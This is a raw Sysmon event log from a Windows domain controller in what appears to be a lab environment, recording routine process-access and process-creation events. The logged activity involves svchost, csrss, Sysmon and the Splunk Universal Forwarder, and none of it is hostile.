10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3E0A-5F80-3E00-000000007F01}39323936C:\Windows\system32\cmd.exe{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.811{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{733EE690-3E0A-5F80-3E00-000000007F01}3932C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-3E00-000000007F01}3932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3E00-000000007F01}3932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0A-5F80-3E00-000000007F01}3932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.806{733EE690-3E0A-5F80-3E00-000000007F01}3932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3D00-000000007F01}3900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.791{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3E0A-5F80-3B00-000000007F01}38403860C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-3C00-000000007F01}3876C:\Program 